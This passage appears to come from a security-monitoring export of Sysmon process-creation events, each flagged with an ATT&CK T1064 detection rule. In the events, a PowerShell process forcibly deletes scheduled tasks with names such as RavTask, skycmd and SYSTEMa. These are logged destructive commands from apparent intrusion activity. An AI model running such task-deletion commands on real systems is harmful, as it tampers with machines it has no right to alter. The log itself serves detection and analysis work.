{df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:40.874"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-0010f3543100}"",""processId"":""5016"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN GooglePingConfigs /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.485",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.805 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-001031533100} +ProcessId: 3664 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN RavTask /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN RavTask /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.836041500Z"",""eventRecordID"":""3966"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.805\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-001031533100}\r\nProcessId: 3664\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN RavTask /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:40.805"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-001031533100}"",""processId"":""3664"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN RavTask /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.479",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.727 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-00109a513100} +ProcessId: 6300 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Flash /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: 
Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Flash /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.735542400Z"",""eventRecordID"":""3965"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.727\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-00109a513100}\r\nProcessId: 6300\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Flash /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:40.727"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-00109a513100}"",""processId"":""6300"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Flash /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.453",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.705 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-00100c503100} +ProcessId: 7564 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN Netframework /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Netframework /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.707042900Z"",""eventRecordID"":""3964"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.705\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-00100c503100}\r\nProcessId: 7564\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Netframework /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: 
Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:40.705"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-00100c503100}"",""processId"":""7564"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Netframework /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.435",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.680 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-0010064e3100} +ProcessId: 7724 +Image: 
C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Miscfost /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Miscfost /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.682245000Z"",""eventRecordID"":""3963"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.680\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-0010064e3100}\r\nProcessId: 7724\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" 
/Delete /TN Miscfost /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:40.680"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-0010064e3100}"",""processId"":""7724"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Miscfost /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 
29, 2020 @ 14:21:10.420",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.658 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-0010694c3100} +ProcessId: 7072 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN skycmd /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN skycmd /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.661548500Z"",""eventRecordID"":""3962"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.658\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-0010694c3100}\r\nProcessId: 7072\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 
(WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN skycmd /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:40.658"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-0010694c3100}"",""processId"":""7072"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN skycmd /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.405",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.631 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-0010d64a3100} +ProcessId: 7968 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN SYSTEMa /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEMa 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.634090700Z"",""eventRecordID"":""3961"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.631\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-0010d64a3100}\r\nProcessId: 7968\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEMa /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 